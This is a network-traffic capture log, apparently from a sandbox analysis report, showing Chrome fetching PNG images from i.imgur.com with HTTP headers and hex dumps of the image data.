2025-03-24 13:42:21 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-24 13:42:21 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-24 13:42:21 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-03-24 13:42:21 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-03-24 13:42:21 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-03-24 13:42:21 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-24 13:42:21 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-03-24 13:42:21 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-24 13:42:21 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-24 13:42:21 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49719	199.232.196.193	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:42:22 UTC	386	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:42:22 UTC	756	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Mon, 24 Mar 2025 13:42:22 GMT Age: 2526799 X-Served-By: cache-iad-kiad7000021-IAD, cache-lga21957-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 11253, 1 X-Timer: S1742823742.366873,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-24 13:42:22 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-24 13:42:22 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-24 13:42:22 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-24 13:42:22 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-24 13:42:22 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49720	199.232.196.193	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:42:22 UTC	386	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:42:22 UTC	757	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Mon, 24 Mar 2025 13:42:22 GMT Age: 2575815 X-Served-By: cache-iad-kjyo7100129-IAD, cache-lga21983-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 14884, 1 X-Timer: S1742823742.369890,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-24 13:42:22 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-24 13:42:22 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-24 13:42:22 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
